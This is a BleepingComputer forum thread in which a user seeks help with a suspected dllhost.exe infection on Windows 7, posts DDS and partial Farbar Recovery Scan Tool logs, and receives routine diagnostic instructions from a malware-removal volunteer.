Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Help - dllhost.exe virus


  • This topic is locked This topic is locked
34 replies to this topic

#1 sjk117

sjk117

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:03:51 PM

Posted 21 October 2014 - 09:19 PM

Hi, first time posting. It seems my computer has become infected with the "DLLHOST.EXE" replicating virus that consumes memory and continuously tries to reach external IP addresses. I see numerous instances of "dllhost.exe *32" in Task Manager Processes. I was able to download and install Malware Bytes using another computer and a jump drive, and several things were found and removed. Scan is clean now but the dllhost processes and issues with downloads being blocked remain. I reviewed other threads for what appears to be the same issue, but I'm not sure where to start! 

 

Please help!

Sue


Edited by sjk117, 22 October 2014 - 05:59 PM.


BC AdBot (Login to Remove)

 


#2 sjk117

sjk117
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:03:51 PM

Posted 21 October 2014 - 10:31 PM

running Windows 7 Home Premium 64bit SP 1. Infected computer has been removed from internet, I have downloaded DDS to thumb drive with a clean computer  and executed it on the infected machine. Computer was off and restarted right before I ran this, so there weren't any instances of "dllhost.exe *32" running as DDS was executed, but they were propagating all day while it was connected to internet. ***UPDATE 10/22 9:40PM EDT: Connected infected computer to internet again. Watched task manager as I opened IE windows, Not seeing multiples of "dllhost.exe *32" in the process list, just a single dllhost.exe entry, but I still cannot download any files, I get a message that I do not have that privilege, although I am logged in as system admin.

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 10.0.9200.16798  BrowserJavaVersion: 10.71.2
Run by Greg at 23:58:39 on 2014-10-21
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.6103.3149 [GMT -4:00]
.
AV: Norton 360 Premier Edition *Enabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
SP: Norton 360 Premier Edition *Enabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton 360 Premier Edition *Enabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\servicing\TrustedInstaller.exe
C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe
C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe
C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe
C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\N360.exe
C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
C:\Program Files (x86)\Seagate\Seagate Dashboard\SeagateDashboardService.exe
c:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\atieclxx.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\WUDFHost.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe
C:\Windows\system32\Dwm.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\Windows\Explorer.EXE
C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\N360.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
C:\Windows\system32\taskeng.exe
c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\sppsvc.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoDashboard.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Seagate\Seagate Dashboard\HipServAgent\HipServAgent.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://www.yahoo.com/
mStart Page = hxxp://www.yahoo.com/?fr=befhp&type=iehp-3.13-1406
uProxyOverride = <-loopback>;192.168.*.*
mWinlogon: Userinit = userinit.exe,
BHO: {02478D38-C3F9-4efb-9B51-7695ECA05670} - <orphaned>
BHO: RealPlayer Download and Record Plugin for Internet Explorer: {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\ips\ipsbho.dll
BHO: RoboForm Toolbar Helper: {724d43a9-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: {95B7759C-8C7F-4BF1-B163-73684A933233} - <orphaned>
BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
TB: &RoboForm Toolbar: {724D43A0-0D85-11D4-9908-00400523E39A} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll
TB: Google Toolbar: {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
TB: &RoboForm Toolbar: {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coieplg.dll
TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
mRun: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
mRun: [Seagate Dashboard] C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoLauncher.exe --silent --no_ui
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
mRun: [BFHP] C:\Program Files (x86)\Common Files\BeFrugal.com\Toolbar\BFHP.exe
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [Malwarebytes Anti-Exploit] C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe
dRun: [Norton Download Manager{N360P204040-SHPD-FSD33017}] C:\Program Files (x86)\Norton One\Engine\3.2.0.19\ccSvcHst.exe /m
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {320AF880-6646-11D3-ABEE-C5DBF3571F46} - {320AF880-6646-11D3-ABEE-C5DBF3571F46} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll
IE: {320AF880-6646-11D3-ABEE-C5DBF3571F49} - {320AF880-6646-11D3-ABEE-C5DBF3571F49} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll
IE: {724d43aa-0d85-11d4-9908-00400523e39a} - {724d43aa-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} - hxxp://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: {119CE688-A7E9-1941-8E10-F42990BBA4C4} - hxxps://fiserv.assurity.com/reports/control/ASRrptview.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} - hxxps://turborater.webex.com/client/WBXclient-T28L10NSP8EP1-15699/nbr/ieatgpc1.cab
TCP: NameServer = 216.144.187.199 24.229.54.212 204.186.80.229
TCP: Interfaces\{827104AF-A948-4FBA-84C0-08E22C6D3567} : DHCPNameServer = 216.144.187.199 24.229.54.212 204.186.80.229
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coieplg.dll
x64-BHO: RoboForm Toolbar Helper: {724d43a9-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll
x64-BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
x64-BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - LocalServer32 - <no file>
x64-TB: &RoboForm Toolbar: {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll
x64-TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coieplg.dll
x64-TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-Run: [RTHDVCPL] "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {320AF880-6646-11D3-ABEE-C5DBF3571F46} - {320AF880-6646-11D3-ABEE-C5DBF3571F46} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll
x64-IE: {320AF880-6646-11D3-ABEE-C5DBF3571F49} - {320AF880-6646-11D3-ABEE-C5DBF3571F49} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll
x64-IE: {724d43aa-0d85-11d4-9908-00400523e39a} - {724d43aa-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-SSODL: WebCheck - <orphaned>
x64-SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
.
============= SERVICES / DRIVERS ===============
.
R0 amdkmpfd;AMD PCI Root Bus Lower Filter;C:\Windows\System32\drivers\amdkmpfd.sys [2013-10-16 36096]
R0 iaStorA;iaStorA;C:\Windows\System32\drivers\iaStorA.sys [2013-10-23 630632]
R0 iaStorF;iaStorF;C:\Windows\System32\drivers\iaStorF.sys [2013-10-23 28008]
R0 iusb3hcs;Intel® USB 3.0 Host Controller Switch Driver;C:\Windows\System32\drivers\iusb3hcs.sys [2013-6-3 20464]
R0 SymDS;Symantec Data Store;C:\Windows\System32\drivers\N360x64\1506000.020\symds64.sys [2014-10-4 493656]
R0 SymEFA;Symantec Extended File Attributes;C:\Windows\System32\drivers\N360x64\1506000.020\symefa64.sys [2014-10-4 1148120]
R1 BHDrvx64;BHDrvx64;C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\BASHDefs\20141016.001\BHDrvx64.sys [2014-10-20 1587416]
R1 ccSet_MCLIENT;Norton One Settings Manager;C:\Windows\System32\drivers\MCLIENTx64\0302020.00C\ccsetx64.sys [2013-8-20 168096]
R1 ccSet_N360;N360 Settings Manager;C:\Windows\System32\drivers\N360x64\1506000.020\ccsetx64.sys [2014-10-4 162392]
R1 ESProtectionDriver;Malwarebytes Anti-Exploit;C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae64.sys [2014-10-21 63000]
R1 IDSVia64;IDSVia64;C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\IPSDefs\20141021.001\IDSviA64.sys [2014-10-21 633560]
R1 SymIRON;Symantec Iron Driver;C:\Windows\System32\drivers\N360x64\1506000.020\ironx64.sys [2014-10-4 266968]
R1 SymNetS;Symantec Network Security WFP Driver;C:\Windows\System32\drivers\N360x64\1506000.020\symnets.sys [2014-10-4 593112]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2009-8-18 204288]
R2 DeviceMonitorService;DeviceMonitorService;C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe [2012-9-7 87992]
R2 GsServer;GoodSync Server;C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe [2014-3-30 8574096]
R2 MbaeSvc;Malwarebytes Anti-Exploit Service;C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe [2014-10-21 441144]
R2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [2014-10-21 1871160]
R2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2014-10-21 968504]
R2 MCLIENT;Norton One;C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccsvchst.exe [2013-8-20 143928]
R2 Motorola Device Manager;Motorola Device Manager Service;C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [2013-11-15 137528]
R2 N360;Norton 360;C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe [2014-10-4 265040]
R2 PST Service;PST Service;C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [2014-4-5 65657]
R2 RtkAudioService;Realtek Audio Service;C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [2013-11-28 289496]
R2 SeagateDashboardService;Seagate Dashboard Service;C:\Program Files (x86)\Seagate\Seagate Dashboard\SeagateDashboardService.exe [2011-6-1 14088]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\Windows\System32\drivers\AtihdW76.sys [2013-8-28 96256]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2014-9-9 142640]
R3 HECIx64;Intel® Management Engine Interface;C:\Windows\System32\drivers\HECIx64.sys [2009-9-17 56344]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2014-10-21 25816]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\Windows\System32\drivers\MBAMSwissArmy.sys [2014-10-21 129752]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\drivers\mwac.sys [2014-10-21 63704]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2013-10-11 883928]
R3 SmbDrvI;SmbDrvI;C:\Windows\System32\drivers\Smb_driver_Intel.sys [2013-10-16 34544]
S0 amdkmafd;AMD Audio Bus Lower Filter;C:\Windows\System32\drivers\amdkmafd.sys [2013-10-16 21160]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S3 B-Service;B-Service; [x]
S3 hitmanpro37;HitmanPro 3.7 Support Driver;C:\Windows\System32\drivers\hitmanpro37.sys [2013-11-4 32512]
S3 MonitorFunction;Driver for Monitor;C:\Windows\System32\drivers\TVMonitor.sys [2013-1-22 16376]
S3 SmbDrv;SmbDrv;C:\Windows\System32\drivers\Smb_driver.sys [2012-8-15 22800]
S3 SWDUMon;SWDUMon;C:\Windows\System32\drivers\SWDUMon.sys [2013-9-5 16152]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2011-7-15 59392]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2011-7-14 1255736]
.
=============== File Associations ===============
.
FileExt: .txt: textfile="C:\Program Files (x86)\Windows NT\Accessories\WORDPAD.EXE" "%1" [UserChoice]
.
=============== Created Last 30 ================
.
2014-10-21 19:04:31 -------- d-----w- C:\ProgramData\Malwarebytes Anti-Exploit
2014-10-21 19:04:30 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Exploit
2014-10-21 16:23:32 129752 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-10-21 16:22:49 93400 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-10-21 16:22:49 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-10-21 16:22:49 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2014-10-21 16:22:49 -------- d-----w- C:\ProgramData\Malwarebytes
2014-10-21 16:22:49 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-20 23:42:29 -------- d-----w- C:\Users\Greg\AppData\Local\NPE
2014-10-15 21:38:40 98216 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2014-10-15 18:42:02 -------- d-----w- C:\Users\Greg\AppData\Local\American Enterprise
2014-10-04 10:47:40 876248 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\srtsp64.sys
2014-10-04 10:47:40 593112 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\symnets.sys
2014-10-04 10:47:40 493656 ----a-r- C:\Windows\System32\drivers\N360x64\1506000.020\symds64.sys
2014-10-04 10:47:40 37592 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\srtspx64.sys
2014-10-04 10:47:40 266968 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\ironx64.sys
2014-10-04 10:47:40 23568 ----a-r- C:\Windows\System32\drivers\N360x64\1506000.020\symelam.sys
2014-10-04 10:47:40 1148120 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\symefa64.sys
2014-10-04 10:47:39 162392 ----a-r- C:\Windows\System32\drivers\N360x64\1506000.020\ccsetx64.sys
2014-10-04 10:47:15 -------- d-----w- C:\Windows\System32\drivers\N360x64\1506000.020
.
==================== Find3M  ====================
.
2014-10-22 03:55:15 16152 ----a-w- C:\Windows\System32\drivers\SWDUMon.sys
2014-09-24 14:50:13 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-09-24 14:50:13 701104 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-07-25 06:35:46 875688 ----a-w- C:\Windows\SysWow64\msvcr120_clr0400.dll
2014-07-25 03:47:06 869544 ----a-w- C:\Windows\System32\msvcr120_clr0400.dll
.
============= FINISH:  0:00:26.07 ===============
 


Edited by sjk117, 22 October 2014 - 08:45 PM.


#3 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:10:51 PM

Posted 25 October 2014 - 04:20 AM

Hello! Welcome to BleepingComputer Forums! :welcome:
My name is Georgi and and I will be helping you with your computer problems.

Before we begin, please note the following:

  • I will working be on your Malware issues, this may or may not, solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms does not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested ! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.

 

 

Please download the latest version of Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatibale with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.

 

 

Regards,

Georgi


cXfZ4wS.png


#4 sjk117

sjk117
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:03:51 PM

Posted 25 October 2014 - 08:58 AM

Thanks Georgi, My name is Sue. I appreciate your help. See logs below. I have isolated infected computer from internet, please tell me if any steps we take require internet connection. 

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 25-10-2014
Ran by Greg (administrator) on KIBMAIN on 25-10-2014 09:47:29
Running from E:\
Loaded Profile: Greg (Available profiles: Greg)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Nero AG) C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe
() C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Symantec Corporation) C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccsvchst.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe
(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
(Memeo) C:\Program Files (x86)\Seagate\Seagate Dashboard\SeagateDashboardService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Symantec Corporation) C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccsvchst.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe
(SlimWare Utilities, Inc.) C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Memeo) C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoDashboard.exe
(Axentra Corporation) C:\Program Files (x86)\Seagate\Seagate Dashboard\HipServAgent\HipServAgent.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13662936 2013-11-28] (Realtek Semiconductor)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Seagate Dashboard] => C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoLauncher.exe [79112 2011-06-01] ()
